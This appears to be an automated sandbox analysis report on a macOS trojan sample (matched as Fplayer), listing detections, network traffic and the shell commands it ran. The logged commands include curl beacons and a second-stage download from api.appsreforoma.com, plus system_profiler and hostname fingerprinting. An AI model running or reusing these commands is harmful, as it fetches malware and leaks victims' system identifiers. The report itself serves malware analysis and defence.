Source: malw_sampl |
Virustotal: Detection: 44% |
Perma Link |
Source: malw_sampl |
ReversingLabs: Detection: 34% |
Source: unknown |
HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 192.229.211.108 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.248.193.17 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.248.193.17 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.248.193.17 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.253.83.196 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 17.253.83.196 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
DNS traffic detected: queries for: api.appsreforoma.com |
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp |
String found in binary or memory: http://crl.apple.com/codesigning.crl0 |
Source: malw_sampl |
String found in binary or memory: http://crl.apple.com/root.crl0 |
Source: malw_sampl |
String found in binary or memory: http://crl.apple.com/timestamp.crl0 |
Source: malw_sampl |
String found in binary or memory: http://ocsp.apple.com/ocsp-devid010 |
Source: malw_sampl |
String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd |
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp |
String found in binary or memory: http://www.apple.com/appleca/root.crl0 |
Source: malw_sampl |
String found in binary or memory: http://www.apple.com/appleca0 |
Source: malw_sampl, 00000620.00000258.9.0000000111829000.0000000111852000.r--.sdmp |
String found in binary or memory: http://www.apple.com/certificateauthority0 |
Source: malw_sampl |
String found in binary or memory: https://www.apple.com/appleca/0 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49399 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49403 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49347 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49402 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49401 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49345 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49389 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49388 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49393 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49391 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49388 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49401 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49403 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49352 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49327 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49350 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49399 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49352 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49350 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49393 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49392 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49391 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49390 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49392 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49390 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49389 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49345 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49404 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49402 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49347 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49349 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49349 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49327 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49404 |
Source: unknown |
HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49347 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49350 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 17.248.193.16:443 -> 192.168.11.12:49349 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.131.6:443 -> 192.168.11.12:49352 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49388 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49389 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49391 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49392 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49390 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49393 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49399 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49401 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49402 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49403 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49404 version: TLS 1.2 |
Source: malw_sampl, type: SAMPLE |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown |
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown |
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 Author: unknown |
Source: malw_sampl, type: SAMPLE |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25 |
Source: 00000620.00000258.1.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25 |
Source: 00000620.00000258.9.00000001019db000.00000001019e1000.r-x.sdmp, type: MEMORY |
Matched rule: MacOS_Trojan_Fplayer_1c1fae37 reference_sample = f57e651088dee2236328d09705cef5e98461e97d1eb2150c372d00ca7c685725, os = macos, severity = x86, creation_date = 2021-10-05, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Trojan.Fplayer, fingerprint = abeb3cd51c0ff2e3173739c423778defb9a77bc49b30ea8442e6ec93a2d2d8d2, id = 1c1fae37-8d19-4129-a715-b78163f93fd2, last_modified = 2021-10-25 |
Source: classification engine |
Classification label: mal68.mac@0/4@4/0 |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0' > /dev/null 2>&1 |
Jump to behavior |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion |
Jump to behavior |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }' |
Jump to behavior |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1' > /dev/null 2>&1 |
Jump to behavior |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A 'http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593' > /dev/null 2>&1 |
Jump to behavior |
Source: /Users/bernard/Desktop/malw_sampl (PID: 620) |
Shell command executed: sh -c curl -L 'http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3' > /dev/null 2>&1 |
Jump to behavior |
Source: /bin/sh (PID: 622) |
Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=0 |
Jump to behavior |
Source: /bin/sh (PID: 629) |
Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=1 |
Jump to behavior |
Source: /bin/sh (PID: 631) |
Curl executable: /usr/bin/curl -> curl -f0L -o /tmp/5642A000-E25E-4009-BD13-65DDB1840106/CA5E6B96-0321-49D8-8AB7-67DA458B769A http://api.appsreforoma.com/sd/?c=AGFybQ==&u=6661EB4A-CDF0-4E32-8BDC-6B405B1B36B2&s=5642A000-E25E-4009-BD13-65DDB1840106&o=10.14.2&b=2600652593 |
Jump to behavior |
Source: /bin/sh (PID: 633) |
Curl executable: /usr/bin/curl -> curl -L http://api.appsreforoma.com/slg?s=5642A000-E25E-4009-BD13-65DDB1840106&c=3 |
Jump to behavior |
Source: /bin/sh (PID: 626) |
Awk executable: /usr/bin/awk -> awk /UUID/ { print $3 } |
Jump to behavior |
Source: submission: malw_sampl |
Mach-O header: load_dylib -> /System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices |
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 651) |
Random device file read: /dev/random |
Jump to behavior |
Source: submission |
CodeSign Info: Executable=/Users/bernard/Desktop/malw_sampl |
Source: malw_sampl |
Submission file: section __const with 7.40356224 entropy (max. 8.0) |
Source: /usr/sbin/system_profiler (PID: 627) |
Sysctl read request: hw.model (6.2) |
Jump to behavior |
Source: /bin/sh (PID: 623) |
Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion |
Jump to behavior |
Source: /usr/sbin/system_profiler (PID: 627) |
Sysctl read request: hw.cpu_freq (6.15) |
Jump to behavior |
Source: /usr/sbin/system_profiler (PID: 627) |
Sysctl read request: hw.memsize (6.24) |
Jump to behavior |
Source: /bin/sh (PID: 621) |
Sysctl requested: kern.hostname (1.10) |
Jump to behavior |
Source: /bin/sh (PID: 623) |
Sysctl requested: kern.hostname (1.10) |
Jump to behavior |
Source: /bin/sh (PID: 624) |
Sysctl requested: kern.hostname (1.10) |
Jump to behavior |
Source: /bin/sh (PID: 628) |
Sysctl requested: kern.hostname (1.10) |
Jump to behavior |
Source: /bin/sh (PID: 630) |
Sysctl requested: kern.hostname (1.10) |
Jump to behavior |
Source: /bin/sh (PID: 632) |
Sysctl requested: kern.hostname (1.10) |
Jump to behavior |
Source: /bin/sh (PID: 623) |
Defaults executable: /usr/bin/defaults defaults read /System/Library/CoreServices/SystemVersion.plist ProductVersion |
Jump to behavior |
Source: /bin/sh (PID: 625) |
System_profiler executable: /usr/sbin/system_profiler system_profiler SPHardwareDataType |
Jump to behavior |
Source: /usr/sbin/system_profiler (PID: 625) |
System_profiler executable: /usr/sbin/system_profiler /usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full |
Jump to behavior |